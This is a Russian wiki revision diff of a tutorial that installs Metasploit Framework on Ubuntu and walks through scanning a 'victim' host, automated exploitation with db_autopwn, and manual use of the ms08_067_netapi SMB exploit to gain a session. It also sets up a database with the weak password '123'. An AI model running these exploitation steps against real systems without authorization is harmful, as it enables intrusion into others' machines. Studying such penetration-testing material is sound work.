Metasploit Framework в Ubuntu Сравнение версий

Различия

Здесь показаны различия между двумя версиями данной страницы.

Ссылка на это сравнение

Предыдущая версия справа и слева Предыдущая версия
wiki:metasploit_framework_в_ubuntu [2011/09/27 21:25]
RazrFalconRazrFalconZombie ModO_o
wiki:metasploit_framework_в_ubuntu [2012/04/27 08:30] (текущий)
ChelAxeChelAxeChelAxeChelAxe
Строка 16: Строка 16:
  
 Далее скачиваем Metasploit Framework вот тут: Далее скачиваем Metasploit Framework вот тут:
-http://updates.metasploit.com/​data/​releases/​framework-4.0.0-linux-full.run:+http://downloads.metasploit.com/​data/​releases/​metasploit-latest-linux-installer.run:
 <code bash> <code bash>
-wget http://updates.metasploit.com/​data/​releases/​framework-4.0.0-linux-full.run +wget http://downloads.metasploit.com/​data/​releases/​metasploit-latest-linux-installer.run 
-chmod +x framework-4.*run+chmod +x metasploit-latest-linux-installer.run
 </​code>​ </​code>​
  
 И запускаем… И запускаем…
-<code bash>​sudo ./framework-4.*run</​code>​+<code bash>​sudo ./metasploit-latest-linux-installer.run</​code>​
  
 После установки необходимо обновить Metasploit Framework После установки необходимо обновить Metasploit Framework
 <code bash>​sudo msfupdate</​code>​ <code bash>​sudo msfupdate</​code>​
  
-Теперь самый простой вариант использованияMetasploit Framework. Запустим консоль. +Теперь самый простой вариант использования Metasploit Framework. Запустим консоль. 
-<code bash>Msfconsole</​code>​+<code bash>msfconsole</​code>​
  
 Теперь добавим нашу жертву в базу данных и информацию про его порты. Теперь добавим нашу жертву в базу данных и информацию про его порты.
 <code bash>​db_nmap -sT -sV 192.168.1.1</​code>​ <code bash>​db_nmap -sT -sV 192.168.1.1</​code>​
  
-Отправим все на автоматический взлом =).+Отправим все на автоматический взлом =). Данная команда стала неактуальной в последних версиях.
 <code bash>​db_autopwn -p -t -e</​code>​ <code bash>​db_autopwn -p -t -e</​code>​
  
 Если в конце процесса появятся сессии,​ значит взлом удался. Выбираем сессию и в ходим в нее. Если в конце процесса появятся сессии,​ значит взлом удался. Выбираем сессию и в ходим в нее.
 <code bash>​session -i 1</​code>​ <code bash>​session -i 1</​code>​
 +
 +Альтернатив db_autopwn нет. Использовать эксплоиты можно в ручную. Например так:
 +
 +<code bash>
 +#​Загружаем нужный нам эксплоит
 +use exploit/​windows/​smb/​ms08_067_netapi
 +#​Смотрим опции
 +show options
 +#​Заполняем необходимые поля например IP адрес жертвы
 +set RHOST 192.168.84.58
 +#​Проверяем актуален ли эксплоит для жертвы
 +check
 +#​Ломаем
 +exploit
 +</​code>​
  
 Далее можно заняться многим,​ все зависит от ваших полномочий в системе. Для просмотра команд доступных Вам наберите:​ Далее можно заняться многим,​ все зависит от ваших полномочий в системе. Для просмотра команд доступных Вам наберите:​
Строка 46: Строка 61:
 <code bash>​exit <code bash>​exit
 hosts -d 192.168.1.1</​code>​ hosts -d 192.168.1.1</​code>​
 +
 +Иногда Базы данных отваливаются я решил данный вопрос вот так:
 +<code bash>
 +sudo apt-get install postgresql
 +sudo apt-get install libpgsql-ruby
 +sudo su postgres
 + createuser root -P
 + Enter password for new role: 123
 + Enter it again:123
 + Shall the new role be a 
 + superuser?​ (y/n) n
 + Shall the new role be allowed to 
 + create databases? (y/n) n
 + Shall the new role be allowed to 
 + create more new roles? (y/n) n
 + createdb --owner=root metasploit
 + exit
 +msfconsole
 + db_connect root:​123@127.0.0.1/​metasploit
 +</​code>​
  
 \\ \\  \\ \\ 
  
-^Автор^Раздел^ +Александр Ф Михайлов (ChelAxe)
-|Михайлов ​Александр ​(ChelAxe)|как сделать ...|+
  
 {{tag>​Конкурс}} {{tag>​Конкурс}}